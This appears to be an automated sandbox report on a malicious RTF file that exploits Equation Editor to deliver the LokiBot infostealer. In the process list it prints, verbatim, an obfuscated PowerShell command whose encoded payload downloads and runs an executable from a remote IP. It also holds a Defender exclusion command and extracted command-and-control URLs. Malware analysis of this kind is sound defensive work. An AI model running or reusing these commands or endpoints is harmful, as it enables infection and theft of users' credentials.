Analysis
-
max time kernel
102s -
max time network
106s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
20-11-2024 10:10
Static task
static1
Behavioral task
behavioral1
Sample
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
Resource
win10v2004-20241007-en
General
-
Target
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
-
Size
251KB
-
MD5
e6859034a42f217800b6bf0980e93848
-
SHA1
8dcb69dcf727b7a7fbfbf6755492990dc51fd192
-
SHA256
564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
-
SHA512
778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35
-
SSDEEP
3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2824 EQNEDT32.EXE 6 2500 poWERShell.eXe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1804 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2500 poWERShell.eXe 1056 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 2700 wininit.exe 1420 wininit.exe 1984 wininit.exe -
Loads dropped DLL 3 IoCs
pid Process 2500 poWERShell.eXe 2500 poWERShell.eXe 2500 poWERShell.eXe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wininit.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk poWERShell.eXe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2700 set thread context of 1984 2700 wininit.exe 44 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language poWERShell.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wininit.exe -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2824 EQNEDT32.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1680 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2500 poWERShell.eXe 1056 powershell.exe 2700 wininit.exe 2700 wininit.exe 1804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2500 poWERShell.eXe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 2700 wininit.exe Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1984 wininit.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1680 WINWORD.EXE 1680 WINWORD.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2824 wrote to memory of 2880 2824 EQNEDT32.EXE 31 PID 2824 wrote to memory of 2880 2824 EQNEDT32.EXE 31 PID 2824 wrote to memory of 2880 2824 EQNEDT32.EXE 31 PID 2824 wrote to memory of 2880 2824 EQNEDT32.EXE 31 PID 2880 wrote to memory of 2500 2880 mshta.exe 33 PID 2880 wrote to memory of 2500 2880 mshta.exe 33 PID 2880 wrote to memory of 2500 2880 mshta.exe 33 PID 2880 wrote to memory of 2500 2880 mshta.exe 33 PID 2500 wrote to memory of 1056 2500 poWERShell.eXe 35 PID 2500 wrote to memory of 1056 2500 poWERShell.eXe 35 PID 2500 wrote to memory of 1056 2500 poWERShell.eXe 35 PID 2500 wrote to memory of 1056 2500 poWERShell.eXe 35 PID 2500 wrote to memory of 2184 2500 poWERShell.eXe 36 PID 2500 wrote to memory of 2184 2500 poWERShell.eXe 36 PID 2500 wrote to memory of 2184 2500 poWERShell.eXe 36 PID 2500 wrote to memory of 2184 2500 poWERShell.eXe 36 PID 2184 wrote to memory of 2364 2184 csc.exe 37 PID 2184 wrote to memory of 2364 2184 csc.exe 37 PID 2184 wrote to memory of 2364 2184 csc.exe 37 PID 2184 wrote to memory of 2364 2184 csc.exe 37 PID 2500 wrote to memory of 2700 2500 poWERShell.eXe 39 PID 2500 wrote to memory of 2700 2500 poWERShell.eXe 39 PID 2500 wrote to memory of 2700 2500 poWERShell.eXe 39 PID 2500 wrote to memory of 2700 2500 poWERShell.eXe 39 PID 1680 wrote to memory of 2356 1680 WINWORD.EXE 40 PID 1680 wrote to memory of 2356 1680 WINWORD.EXE 40 PID 1680 wrote to memory of 2356 1680 WINWORD.EXE 40 PID 1680 wrote to memory of 2356 1680 WINWORD.EXE 40 PID 2700 wrote to memory of 1804 2700 wininit.exe 41 PID 2700 wrote to memory of 1804 2700 wininit.exe 41 PID 2700 wrote to memory of 1804 2700 wininit.exe 41 PID 2700 wrote to memory of 1804 2700 wininit.exe 41 PID 2700 wrote to memory of 1420 2700 wininit.exe 43 PID 2700 wrote to memory of 1420 2700 wininit.exe 43 PID 2700 wrote to memory of 1420 2700 wininit.exe 43 PID 2700 wrote to memory of 1420 2700 wininit.exe 43 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 PID 2700 wrote to memory of 1984 2700 wininit.exe 44 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wininit.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wininit.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2356
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt4⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2364
-
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
PID:1420
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1984
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD589305fdda65d73947f803c5d5d091a4f
SHA1482b23036f9eb4e66406aaeb180f4945df9878d9
SHA256ded8bef05d8c334bd02025f80341eabd6412c416bd1870d70376e2e1697378dc
SHA51255b17c46355203dd6668462bf0107a86316639ababe8c0823dba116982ac2cb76051ebf6bd97229be81c1ef30c599c0f1289d00d444f24d1dcf1bdb943f27308
-
Filesize
3KB
MD52199d8595aaf1be3e737f6802a96e1bc
SHA12e35254a31b08f01a6387b58fc1da40f32db4672
SHA256966a05290311a4663d1fd0f1c133f2b0d85ba86a3f2cf4b2223658e50968febf
SHA512c1077ca4743c2978ce33051d5edee78563c72e1444f59353d3208edc3ef635ffa1369d040e630b91baa7fe4350ca33bec6ee551a7314ff283a789561144107f6
-
Filesize
7KB
MD585abcf4e5bbbc4c60ddd892a8362f94d
SHA1dd80d4f21e9ae6177369d12aa2166c279fdd3c76
SHA25695cd0f5128a760c6b211966bfd4cce1ccdb8e6c22cfb663deb81ba89c3f291cf
SHA512ebd6fd66355b0e1afb20f6f4c8f5ac88a082febdbc822c35817811bfbed23ce93a82b93c99e26cd2f9e605e7878332b7e8d0bd74c807e9a25d87de7d50bde9f9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3692679935-4019334568-335155002-1000\0f5007522459c86e95ffcc62f32308f1_6110149a-fcf0-442a-a749-601093ba4822
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c04f3c41985cc013413eaf2ceecf6a56
SHA1ccfb117f414652e7d86e4fa5621e963780007e2e
SHA256ee56fedc94cd68206a7f3bdb6b79f94f330526a5619325692cd56efcb859ea46
SHA51271c79fa4f6c7ccb829c44c6a504be4922ac7eed6cbbf06ad99a072f3ad60df687f918c3837b13775b0348fbae0006694ed88bf246fb7a10895614c2018491623
-
Filesize
23KB
MD5ec0d423a3f72d69975a1e31a275f5377
SHA1213922fb8456ecaadc24889afec1ac6ef5010c68
SHA2569fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA5128132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
-
Filesize
652B
MD5999c87e859de2b9b8b054d93932f84ac
SHA12271f2cd0b04f2c4c939246e09c73f6464e4d571
SHA256b6c08100f15e6f8599dc10f196b3fd2d1dee3d6e6cf79f6d18f26097e1f1e8a3
SHA512d0f88c16fc5100440eff04be383fceb1c3118288275022e35a0cb8058898cdc56b0751aa571374ea2054c03af63a73d8fb4fb70406675023c300760ef8cead2e
-
Filesize
480B
MD5b0517586f4097114e790c61f2685f0d5
SHA120f7482298ab96731228ebd5242ceddfd72ff50f
SHA256a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0
-
Filesize
309B
MD5c92670f3725404e64b76b8d9980423fc
SHA15d13b67ece4a024ab25fb99b91c22606c1a7e19d
SHA256377d8c2b51a5cb5db8089cb24d224dbbeb8c5948d489ecd216f4735b40156c29
SHA5125f4989b0e1280eefcb58a10a83fd009cedde8b91d0d98e47f28f53b0bf0475e567544736a8f65cdfebb1b643bfeba938781539fd37226488c8b2748b4c01b072
-
Filesize
586KB
MD566b03d1aff27d81e62b53fc108806211
SHA12557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA25659586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA5129f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d